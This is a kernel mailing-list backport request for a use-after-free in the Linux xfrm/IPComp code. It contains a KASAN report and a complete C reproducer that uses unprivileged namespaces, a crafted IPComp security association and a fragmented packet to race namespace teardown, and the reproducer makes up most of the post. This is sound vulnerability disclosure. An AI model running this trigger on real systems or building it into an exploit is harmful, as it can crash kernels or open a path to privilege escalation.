Hi all,
Just a gentle follow-up on this backport request, now with a KASAN report and a reproducer.
KASAN Report: BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:988 [inline] BUG: KASAN: slab-use-after-free in hlist_del_rcu include/linux/rculist.h:516 [inline] BUG: KASAN: slab-use-after-free in __xfrm_state_delete+0x7bb/0x8e0 net/xfrm/xfrm_state.c:761 Write of size 8 at addr ffff88802eba0418 by task kworker/0:5/397627
CPU: 0 UID: 0 PID: 397627 Comm: kworker/0:5 Tainted: 6.12.51 #2 Tainted: [W]=WARN Workqueue: events xfrm_state_gc_task Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0xd7/0x130 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:377 [inline] print_report+0xc4/0x640 mm/kasan/report.c:481 kasan_report+0xd8/0x110 mm/kasan/report.c:594 __hlist_del include/linux/list.h:988 [inline] hlist_del_rcu include/linux/rculist.h:516 [inline] __xfrm_state_delete+0x7bb/0x8e0 net/xfrm/xfrm_state.c:761 xfrm_state_delete net/xfrm/xfrm_state.c:795 [inline] xfrm_state_delete_tunnel+0x17c/0x1b0 net/xfrm/xfrm_state.c:3014 ipcomp_destroy+0x4a/0xc0 net/xfrm/xfrm_ipcomp.c:318 ___xfrm_state_destroy+0x252/0x5c0 net/xfrm/xfrm_state.c:549 xfrm_state_gc_task+0x111/0x180 net/xfrm/xfrm_state.c:572 process_one_work+0x8e3/0x1930 kernel/workqueue.c:3229 process_scheduled_works kernel/workqueue.c:3310 [inline] worker_thread+0x781/0x10a0 kernel/workqueue.c:3391 kthread+0x2fa/0x400 kernel/kthread.c:389 ret_from_fork+0x4a/0x80 arch/x86/kernel/process.c:152 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 </TASK>
Allocated by task 9: kasan_save_stack+0x33/0x60 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:377 [inline] __kasan_kmalloc+0x8f/0xa0 mm/kasan/common.c:394 kasan_kmalloc include/linux/kasan.h:260 [inline] __do_kmalloc_node mm/slub.c:4313 [inline] __kmalloc_noprof+0x219/0x530 mm/slub.c:4325 kmalloc_noprof include/linux/slab.h:882 [inline] kzalloc_noprof include/linux/slab.h:1014 [inline] xfrm_hash_alloc+0xd6/0x100 net/xfrm/xfrm_hash.c:21 xfrm_hash_resize+0x66/0x2310 net/xfrm/xfrm_state.c:170 [...]
Freed by task 30: kasan_save_stack+0x33/0x60 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:579 poison_slab_object mm/kasan/common.c:247 [inline] __kasan_slab_free+0x37/0x50 mm/kasan/common.c:264 kasan_slab_free include/linux/kasan.h:233 [inline] slab_free_hook mm/slub.c:2374 [inline] slab_free mm/slub.c:4632 [inline] kfree+0x14a/0x4a0 mm/slub.c:4780 xfrm_hash_free+0xc1/0xe0 net/xfrm/xfrm_hash.c:35 xfrm_state_fini+0x226/0x310 net/xfrm/xfrm_state.c:3233 xfrm_net_exit+0x32/0x70 net/xfrm/xfrm_policy.c:4342 ops_exit_list+0xb5/0x180 net/core/net_namespace.c:173 cleanup_net+0x5b8/0xb20 net/core/net_namespace.c:642 [...]
2. Reproducer The C reproducer is pasted below.
Given that this UAF is reproducible and reachable from unprivileged namespaces (if unshare is allowed), I suggest backporting commit b441cf3f8c4b to all active LTS branches.
Thanks, Slavin Liu
--- repro.c:
// gcc repro.c -o poc -lz #define _GNU_SOURCE #include <arpa/inet.h> #include <errno.h> #include <fcntl.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <linux/xfrm.h> #include <net/if.h> #include <netinet/in.h> #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <netinet/ip.h> #include <zlib.h>
// =-=-=-=-=-=-=-= CONFIG =-=-=-=-=-=-=-= #define SPI 0x1100 #define TUNNEL_SRC "172.16.22.148" #define TUNNEL_DST "172.16.194.141"
// =-=-=-=-=-=-=-= UTILS =-=-=-=-=-=-=-= #define die(msg) do { perror(msg); exit(EXIT_FAILURE); } while(0)
/*
 * Write the NUL-terminated string `buf` into the already-existing file
 * `filename` (opened write-only, never created).
 *
 * Any failure to open the file, or a write that does not transfer the whole
 * string in one call, terminates the process through die().
 */
void write_file(const char * filename, const char * buf)
{
    const int fd = open(filename, O_WRONLY | O_CLOEXEC);
    if (fd < 0)
        die("open");

    const size_t expected = strlen(buf);
    const ssize_t written = write(fd, buf, expected);
    /* A negative result (error) and a short write are both fatal. */
    if (written < 0 || (size_t)written != expected)
        die("write");

    close(fd);
}
/*
 * Create a new user and network namespace.
 * This allows an unprivileged user to configure XFRM interfaces and rules.
 *
 * After unshare() the caller's original uid/gid are mapped to 0 inside the
 * new user namespace by writing /proc/self/uid_map and /proc/self/gid_map.
 * "deny" is written to /proc/self/setgroups before gid_map (see
 * user_namespaces(7) for why an unprivileged writer needs that order).
 *
 * Any failure terminates the process via die().
 */
static void init_namespace(void)
{
    char uid_map[128];
    char gid_map[128];
    /* Captured before unshare(): these are the IDs in the parent namespace
     * that the map entries below must refer to. */
    const uid_t uid = getuid();
    const gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWIPC))
        die("unshare");

    /* uid_t/gid_t are unsigned; "%d" would render IDs above INT_MAX as
     * negative numbers, which the kernel rejects. snprintf also bounds the
     * write to the destination buffer. */
    snprintf(uid_map, sizeof(uid_map), "0 %u 1\n", (unsigned int)uid);
    snprintf(gid_map, sizeof(gid_map), "0 %u 1\n", (unsigned int)gid);

    write_file("/proc/self/uid_map", uid_map);
    write_file("/proc/self/setgroups", "deny");
    write_file("/proc/self/gid_map", gid_map);
}
/*
 * Set IFF_UP on the network interface named `ifname`.
 *
 * The current flags are first read with SIOCGIFFLAGS, IFF_UP is OR-ed in,
 * and the result is written back with SIOCSIFFLAGS, so every other flag the
 * interface already carries is preserved.
 *
 * Any failure terminates the process via die().
 */
static void bring_interface_up(const char *ifname)
{
    int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0)
        die("socket");

    struct ifreq ifr;
    memset(&ifr, 0, sizeof ifr);
    /* snprintf always NUL-terminates and truncates to IFNAMSIZ - 1 chars. */
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", ifname);

    /* Read the existing flags. The original issued SIOCSIFFLAGS here, which
     * wrote an all-zero flag word to the interface instead of fetching it. */
    if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0)
        die("SIOCGIFFLAGS");

    ifr.ifr_flags |= IFF_UP;
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0)
        die("SIOCSIFFLAGS");

    close(sockfd);
}
// =-=-=-=-=-=-=-= XFRM UTILS =-=-=-=-=-=-=-= int nlfd;
/*
 * Helper to add IP addresses using netlink
 *
 * Sends one RTM_NEWADDR request (with NLM_F_ACK) that assigns the IPv4
 * address `ip`/`prefix_len` to interface `ifname`, then reads a single reply
 * and checks it for an error.
 *
 * ifname:     interface name, resolved with if_nametoindex().
 * ip:         dotted-quad IPv4 address text.
 * prefix_len: prefix length stored in ifa_prefixlen.
 *
 * Returns 0 on success. Every failure terminates the process via die().
 */
int add_ip_address(const char *ifname, const char *ip, int prefix_len)
{
    struct {
        struct nlmsghdr n;
        struct ifaddrmsg ifa;
        char buf[256];
    } req;
    /* The union gives the receive buffer the alignment struct nlmsghdr
     * needs; a bare char array carries no such guarantee. */
    union {
        struct nlmsghdr hdr;
        char raw[4096];
    } resp;
    struct sockaddr_nl nladdr;
    struct rtattr *rta;
    struct in_addr addr;
    int sockfd;
    int ifindex;
    ssize_t len;

    ifindex = if_nametoindex(ifname);
    if (ifindex == 0)
        die("if_nametoindex");

    if (inet_pton(AF_INET, ip, &addr) != 1) {
        /* inet_pton() returns 0 for malformed text without touching errno,
         * so give perror() something meaningful to print. */
        errno = EINVAL;
        die("Invalid IP address");
    }

    sockfd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (sockfd < 0)
        die("socket");

    memset(&req, 0, sizeof(req));
    req.n.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg));
    req.n.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK;
    req.n.nlmsg_type = RTM_NEWADDR;

    req.ifa.ifa_family = AF_INET;
    req.ifa.ifa_prefixlen = prefix_len;
    req.ifa.ifa_flags = IFA_F_PERMANENT;
    req.ifa.ifa_scope = RT_SCOPE_UNIVERSE;
    req.ifa.ifa_index = ifindex;

    /* Append a single IFA_LOCAL attribute right after the aligned header. */
    rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.n.nlmsg_len));
    rta->rta_type = IFA_LOCAL;
    rta->rta_len = RTA_LENGTH(sizeof(addr));
    memcpy(RTA_DATA(rta), &addr, sizeof(addr));
    req.n.nlmsg_len = NLMSG_ALIGN(req.n.nlmsg_len) + rta->rta_len;

    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;

    if (sendto(sockfd, &req, req.n.nlmsg_len, 0,
               (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
        die("sendto");

    len = recv(sockfd, resp.raw, sizeof(resp.raw), 0);
    if (len < 0)
        die("recv");

    /* Do not look at header fields unless a complete message arrived. */
    if (!NLMSG_OK(&resp.hdr, (int)len)) {
        errno = EBADMSG;
        die("recv");
    }

    if (resp.hdr.nlmsg_type == NLMSG_ERROR) {
        if (resp.hdr.nlmsg_len < NLMSG_LENGTH(sizeof(struct nlmsgerr))) {
            errno = EBADMSG;
            die("recv");
        }

        struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(&resp.hdr);
        if (err->error != 0) {
            /* The error field holds a negated errno value; hand it to
             * perror() instead of whatever errno happened to contain. */
            errno = -err->error;
            die("Netlink error");
        }
    }

    close(sockfd);
    return 0;
}
/*
 * Prepare the loopback interface for the test traffic: add 10.0.0.0/8 and
 * 172.16.0.0/12 to "lo", then write the per-interface IPv4 sysctls listed
 * below (rp_filter, accept_local, disable_xfrm, disable_policy).
 *
 * The table is applied top to bottom, matching the original write order.
 */
static void configure_lo()
{
    static const struct {
        const char *path;
        const char *value;
    } settings[] = {
        { "/proc/sys/net/ipv4/conf/lo/rp_filter",       "0" },
        { "/proc/sys/net/ipv4/conf/all/rp_filter",      "0" },
        { "/proc/sys/net/ipv4/conf/lo/accept_local",    "1" },
        { "/proc/sys/net/ipv4/conf/all/accept_local",   "1" },
        /* Enable xfrm on lo to allow IPComp processing */
        { "/proc/sys/net/ipv4/conf/lo/disable_xfrm",    "0\n" },
        { "/proc/sys/net/ipv4/conf/lo/disable_policy",  "0\n" },
    };

    add_ip_address("lo", "10.0.0.0", 8);
    add_ip_address("lo", "172.16.0.0", 12);

    for (size_t i = 0; i < sizeof(settings) / sizeof(settings[0]); i++)
        write_file(settings[i].path, settings[i].value);
}
/*
 * Open a NETLINK_XFRM socket, bind it with nl_pid set to this process's
 * PID, and connect it to nl_pid 0.
 *
 * Returns the socket descriptor. Failures terminate the process via die().
 */
static int nl_open_xfrm(void)
{
    struct sockaddr_nl local;
    struct sockaddr_nl kernel;
    int sk;

    sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sk < 0)
        die("socket");

    memset(&local, 0, sizeof(local));
    local.nl_family = AF_NETLINK;
    local.nl_pid = (uint32_t)getpid();
    if (bind(sk, (struct sockaddr *)&local, sizeof(local)) < 0)
        die("bind");

    memset(&kernel, 0, sizeof(kernel));
    kernel.nl_family = AF_NETLINK;
    kernel.nl_pid = 0;
    if (connect(sk, (struct sockaddr *)&kernel, sizeof(kernel)) < 0)
        die("connect");

    return sk;
}
/*
 * Build and send an XFRM_MSG_NEWSA request for an IPv4 IPComp state in
 * tunnel mode, carrying one XFRMA_ALG_COMP attribute naming "deflate".
 * According to the reproducer's own notes, installing this state is what
 * makes the kernel allocate 'x->tunnel'.
 *
 * saddr_be/daddr_be:             selector (inner) addresses, /32 each.
 * spi_be:                        value stored in id.spi.
 * tunnel_src_be/tunnel_dst_be:   outer addresses (saddr / id.daddr).
 * All address/SPI arguments are stored verbatim; callers pass them already
 * in network byte order.
 *
 * The request is sent on the global `nlfd`; the NLM_F_ACK reply is not read
 * here. A send() failure terminates the process via die().
 */
static void xfrm_add_sa_tunnel_ipcomp_v4(uint32_t saddr_be, uint32_t daddr_be, uint32_t spi_be, uint32_t tunnel_src_be, uint32_t tunnel_dst_be)
{
    char req[NLMSG_SPACE(sizeof(struct xfrm_usersa_info)) +
             NLA_ALIGN(NLA_HDRLEN + sizeof(struct xfrm_algo) + 0)];
    struct nlmsghdr *hdr = (struct nlmsghdr *)req;
    struct xfrm_usersa_info *info;
    struct nlattr *attr;
    struct xfrm_algo *comp;
    size_t attr_off;

    /* One memset zeroes header, SA info and attribute alike. */
    memset(req, 0, sizeof(req));

    hdr->nlmsg_type = XFRM_MSG_NEWSA;
    hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
    hdr->nlmsg_seq = 1;
    hdr->nlmsg_pid = (uint32_t)getpid();

    info = (struct xfrm_usersa_info *)NLMSG_DATA(hdr);
    info->family = AF_INET;
    info->mode = XFRM_MODE_TUNNEL;
    info->replay_window = 0;

    /* Outer (tunnel) identity. */
    info->id.proto = IPPROTO_COMP;
    info->id.spi = spi_be;
    info->id.daddr.a4 = tunnel_dst_be;
    info->saddr.a4 = tunnel_src_be;

    /* Inner traffic selector. */
    info->sel.family = AF_INET;
    info->sel.saddr.a4 = saddr_be;
    info->sel.daddr.a4 = daddr_be;
    info->sel.prefixlen_s = 32;
    info->sel.prefixlen_d = 32;

    /* Every lifetime limit is set to XFRM_INF, as in the original. */
    info->lft.soft_byte_limit = XFRM_INF;
    info->lft.hard_byte_limit = XFRM_INF;
    info->lft.soft_packet_limit = XFRM_INF;
    info->lft.hard_packet_limit = XFRM_INF;
    info->lft.soft_add_expires_seconds = XFRM_INF;
    info->lft.hard_add_expires_seconds = XFRM_INF;
    info->lft.soft_use_expires_seconds = XFRM_INF;
    info->lft.hard_use_expires_seconds = XFRM_INF;

    /* The attribute starts at the aligned end of the fixed-size payload. */
    attr_off = NLMSG_ALIGN(NLMSG_LENGTH(sizeof(*info)));
    attr = (struct nlattr *)(req + attr_off);
    comp = (struct xfrm_algo *)((char *)attr + NLA_HDRLEN);

    attr->nla_type = XFRMA_ALG_COMP;
    attr->nla_len = NLA_HDRLEN + sizeof(*comp);

    snprintf(comp->alg_name, sizeof(comp->alg_name), "%s", "deflate");
    comp->alg_key_len = 0;

    hdr->nlmsg_len = attr_off + NLA_ALIGN(attr->nla_len);

    if (send(nlfd, hdr, hdr->nlmsg_len, 0) < 0)
        die("send");
}
/*
 * One-shot environment setup for the trigger: enter fresh namespaces, bring
 * "lo" up, configure its addresses/sysctls, and open the XFRM netlink socket
 * into the global `nlfd`.
 */
void setup_xfrm_env()
{
    init_namespace();
    bring_interface_up("lo");
    configure_lo();

    if ((nlfd = nl_open_xfrm()) < 0)
        die("nl_open_xfrm");
}
// =-=-=-=-=-=-=-= PACKET CONSTRUCTION =-=-=-=-=-=-=-=
/*
 * Compute the IPv4 header checksum: the one's-complement of the
 * one's-complement sum of the header's 16-bit words.
 *
 * iph: header to sum. Its `check` field must be zero when generating a
 *      checksum; summing a header whose `check` is already correct yields 0.
 *      The header length is taken from the IHL nibble (ihl * 4 bytes).
 *
 * Returns the checksum in the same byte layout as the words were read, so
 * it can be stored directly into iph->check.
 *
 * The header is read byte-wise via memcpy rather than through a uint16_t *
 * cast: callers hand in pointers into plain byte arrays, which need not be
 * 2-byte aligned and must not be accessed through an incompatible lvalue.
 */
uint16_t ip_checksum(const struct iphdr *iph)
{
    const unsigned char *bytes = (const unsigned char *)iph;
    /* IHL is the low nibble of the first header byte (RFC 791); it counts
     * 32-bit words, so the length is always a multiple of four and there is
     * never a trailing odd byte to handle. */
    size_t remaining = (size_t)(bytes[0] & 0x0f) * 4;
    uint32_t sum = 0;

    while (remaining > 1) {
        uint16_t word;

        memcpy(&word, bytes, sizeof(word));
        sum += word;
        bytes += sizeof(word);
        remaining -= sizeof(word);
    }

    /* Fold the carries back into the low 16 bits (twice covers the carry
     * the first fold can itself produce). */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);

    return (uint16_t)~sum;
}
/* 4-byte header placed between the outer IPv4 header and the compressed
 * payload by trigger_fragment_with_secpath(). */
struct ipcomp_hdr {
    uint8_t nexthdr;  /* protocol of the decompressed payload (IPPROTO_IPIP in this file) */
    uint8_t flags;    /* written as 0 in this file */
    uint16_t cpi;     /* stored as htons(SPI), i.e. network byte order */
};
static int deflate_raw(const void *in, size_t in_len, void *out, size_t *out_len) { z_stream strm; memset(&strm, 0, sizeof(strm)); int ret = deflateInit2(&strm, Z_DEFAULT_COMPRESSION, Z_DEFLATED, -15, // raw deflate (no zlib header) 8, Z_DEFAULT_STRATEGY); if (ret != Z_OK) return -1;
strm.next_in = (Bytef *)in; strm.avail_in = (uInt)in_len; strm.next_out = (Bytef *)out; strm.avail_out= (uInt)*out_len;
ret = deflate(&strm, Z_FINISH); if (ret != Z_STREAM_END) { deflateEnd(&strm); return -1; }
*out_len = strm.total_out; deflateEnd(&strm); return 0; }
/*
 * Serialise an IPv4 packet (20-byte header without options, followed by
 * `payload`) into `buf`.
 *
 * buf, buf_cap:     destination and its capacity in bytes.
 * src, dst:         dotted-quad addresses, converted with inet_addr().
 * id:               IP identification (host order; converted here).
 * proto:            value for the protocol field.
 * frag_flags_off:   combined flags/fragment-offset field (host order;
 *                   converted here).
 * payload, payload_len: bytes copied verbatim after the header.
 *
 * Returns the total packet length, or 0 when `buf` is too small.
 */
static size_t build_inner_ipv4_packet(uint8_t *buf, size_t buf_cap, const char *src, const char *dst, uint16_t id, uint8_t proto, uint16_t frag_flags_off, const void *payload, size_t payload_len)
{
    const size_t total = sizeof(struct iphdr) + payload_len;
    struct iphdr hdr;

    if (total > buf_cap)
        return 0;

    /* Assemble the header in a local object, then copy it out. */
    memset(&hdr, 0, sizeof(hdr));
    hdr.version = 4;
    hdr.ihl = 5;
    hdr.tos = 0;
    hdr.tot_len = htons(total);
    hdr.id = htons(id);
    hdr.frag_off = htons(frag_flags_off);
    hdr.ttl = 64;
    hdr.protocol = proto;
    hdr.saddr = inet_addr(src);
    hdr.daddr = inet_addr(dst);
    /* The checksum is computed over the header with `check` still zero. */
    hdr.check = 0;
    hdr.check = ip_checksum(&hdr);

    memcpy(buf, &hdr, sizeof(hdr));
    memcpy(buf + sizeof(hdr), payload, payload_len);
    return total;
}
#define INNER_PAY_SZ 1400
/* * Sends a crafted packet: * Outer: IP -> IPComp (Tunnel Mode) * Inner: IP (Fragmented) -> UDP * * This forces the packet to enter the reassembly queue (gro_cells_receive) * after decompression, holding a ref to the IPComp state. */ void trigger_fragment_with_secpath() { int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sock < 0) die("socket");
int one = 1; if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) die("setsockopt IP_HDRINCL");
// 1. Construct Inner IPv4 Packet (Fragmented: IP_MF set) uint8_t inner_payload[INNER_PAY_SZ]; memset(inner_payload, 0xAA, sizeof(inner_payload));
const uint16_t INNER_ID = 0x5678; const uint16_t INNER_FRAG_OFFSET = 1400; // bytes // Set More Fragments (IP_MF) to ensure it stays in reassembly queue const uint16_t inner_frag_off_field = IP_MF | (INNER_FRAG_OFFSET >> 3);
uint8_t inner_packet[sizeof(struct iphdr) + INNER_PAY_SZ]; size_t inner_packet_len = build_inner_ipv4_packet( inner_packet, sizeof(inner_packet), "10.0.0.2", "10.0.0.1", INNER_ID, IPPROTO_UDP, inner_frag_off_field, inner_payload, sizeof(inner_payload) ); if (!inner_packet_len) die("inner packet too big");
// 2. Compress the inner packet (IPComp payload) uint8_t comp_buf[sizeof(inner_packet) + 128]; size_t comp_len = sizeof(comp_buf); if (deflate_raw(inner_packet, inner_packet_len, comp_buf, &comp_len) != 0) { die("deflate_raw failed"); }
// 3. Build outer packet: [outer IP][IPCOMP][compressed bytes] uint8_t packet[sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + sizeof(comp_buf)]; struct iphdr *outer_iph = (struct iphdr *)packet;
outer_iph->version = 4; outer_iph->ihl = 5; outer_iph->tos = 0; size_t outer_len = sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + comp_len; outer_iph->tot_len = htons(outer_len); outer_iph->id = htons(0x1234); outer_iph->frag_off= htons(IP_DF); outer_iph->ttl = 64; outer_iph->protocol= IPPROTO_COMP; // Trigger XFRM Input outer_iph->saddr = inet_addr(TUNNEL_SRC); outer_iph->daddr = inet_addr(TUNNEL_DST); outer_iph->check = 0;
struct ipcomp_hdr *ipcomp = (struct ipcomp_hdr *)(packet + sizeof(struct iphdr)); ipcomp->nexthdr = IPPROTO_IPIP; // decompressed payload is an IPv4 packet ipcomp->flags = 0; ipcomp->cpi = htons(SPI);
memcpy(packet + sizeof(struct iphdr) + sizeof(struct ipcomp_hdr), comp_buf, comp_len);
outer_iph->check = ip_checksum(outer_iph);
struct sockaddr_in dest = { .sin_family = AF_INET, .sin_addr.s_addr = inet_addr(TUNNEL_DST) };
if (sendto(sock, packet, outer_len, 0, (struct sockaddr*)&dest, sizeof(dest)) < 0) { die("sendto"); } close(sock); }
// =-=-=-=-=-=-=-= MAIN =-=-=-=-=-=-=-=
/*
 * Trigger loop: repeatedly fork a child that sets up a fresh namespace,
 * installs the IPComp state, sends the crafted fragment and exits at once.
 * Runs until interrupted; command-line arguments are ignored.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    printf("[*] Starting UAF Trigger Loop...\n");
    printf("[*] Ctrl+C to stop.\n");

    while (1) {
        // Fork a child process to run the trigger logic
        pid_t child = fork();

        /* Previously a failed fork() (-1) fell through to the parent path
         * and the loop kept spinning without ever running the trigger. */
        if (child < 0)
            die("fork");

        if (child == 0) {
            // Child Process:

            // 1. Create isolated namespace
            setup_xfrm_env();

            uint32_t inner_src = inet_addr("10.0.0.1");
            uint32_t inner_dst = inet_addr("10.0.0.2");
            uint32_t tunnel_src = inet_addr(TUNNEL_SRC);
            uint32_t tunnel_dst = inet_addr(TUNNEL_DST);
            uint32_t spi = htonl(SPI);

            // 2. Add IPComp State (allocates x->tunnel)
            xfrm_add_sa_tunnel_ipcomp_v4(inner_src, inner_dst, spi, tunnel_src, tunnel_dst);

            // 3. Send packet to sit in reassembly queue (holds ref to xfrm_state)
            trigger_fragment_with_secpath();

            // 4. Exit immediately.
            // This triggers netns teardown:
            //   -> ipv4_frags_exit_net (stops reassembly, schedules free work)
            //   -> xfrm_net_exit (flushes state, freeing xfrm_hash)
            // If xfrm_state_fini() happens before skb in reassembly get
            // destroyed -> UAF.
            exit(0);
        }

        // Reap the child, then pause for a second before the next round
        // (presumably to let the kernel's netns cleanup run; waitpid itself
        // only waits for the process to exit).
        waitpid(-1, NULL, 0);
        sleep(1);
    }

    return 0;
}